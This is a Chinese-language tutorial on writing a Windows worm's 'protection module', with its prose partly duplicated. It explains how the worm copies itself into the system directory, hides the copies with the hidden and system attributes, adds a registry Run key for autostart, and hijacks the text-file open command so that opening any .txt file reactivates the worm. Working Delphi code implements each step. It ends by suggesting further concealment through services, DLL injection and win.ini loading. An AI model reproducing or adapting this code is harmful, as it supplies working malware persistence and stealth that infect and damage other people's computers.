一)保护模块。
一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :
相关的函数还有GetWindowsDirectory可以得到%windows%的路径
得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :
拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数SetFileAttributes :
我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM
下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,首先用RegOpenKey函数来打开一个键。
得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。
下面,我综合上面的说明来给出一个简短的例子:
我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。
不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。
如:
这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。
一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :
| UINT GetSystemDirectory( LPTSTR lpBuffer, // 存放返回的字符串的缓冲区 UINT uSize // 上面的缓冲去的长度 ); |
相关的函数还有GetWindowsDirectory可以得到%windows%的路径
得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :
| BOOL CopyFile( LPCTSTR lpExistingFileName, // 源文件的路径 LPCTSTR lpNewFileName, // 目标文件的路径 BOOL bFailIfExists // 这是一个标志,如果目标文件已经存在,是否强制覆盖 ); |
拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数SetFileAttributes :
| BOOL SetFileAttributes( LPCTSTR lpFileName, // 需要设置的文件的文件名 DWORD dwFileAttributes // 设置的值。 ); |
我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM
下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,首先用RegOpenKey函数来打开一个键。
| LONG RegOpenKey( HKEY hKey, // 主键,比如HKEY_LOCAL_MACHINE LPCTSTR lpSubKey, // 跟随的subkey PHKEY phkResult // 存放函数返回这个打开的键的句柄 ); |
得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。
| LONG RegSetvalueEx( HKEY hKey, // 这个就是刚才我们得到的句柄 LPCTSTR lpvalueName, // 键名的地址 DWORD Reserved, // 一般设置为0 DWORD dwType, // 我们写的键的类型,字符串为REG_SZ CONST BYTE *lpData, // 键值的地址 DWORD cbData // 写入的键值的长度 ); |
下面,我综合上面的说明来给出一个简短的例子:
| procedure SelfCopy; var Path,value:array [0..255] of char; Hk:HKEY; S:string; begin GetSystemDirectory(Path,256); //取得系统的路径 s:=strpas(Path); //转换成字符串 CopyFile(pchar(paramstr(0)),pchar(S+‘/ruin.exe‘),false); CopyFile(pchar(paramstr(0)),pchar(S+‘/virus_ruin.exe‘),false); //把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe SetFileAttributes(pchar(S+‘/ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(pchar(S+‘/virus_ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); //设置刚才的两个文件为系统和隐藏 RegOpenKey(HKEY_CLASSES_ROOT,‘txtfile/shell/open/command‘,Hk); value:=‘virus_ruin.exe %1‘; RegSetvalueEx(Hk,‘‘,0,REG_SZ,@value,17); //把virus_ruin.exe和文本文件关联 RegOpenKey(HKEY_LOCAL_MACHINE,‘Software/Microsoft/Windows/CurrentVersion/Run‘,Hk); value:=‘ruin.exe‘; RegSetvalueEx(Hk,‘ruin‘,0,REG_SZ,@value,8); //设置开机自动运行ruin.exe end; |
我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。
不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。
如:
| begin if paramcount=1 then shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal); //其他的代码 |
这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。
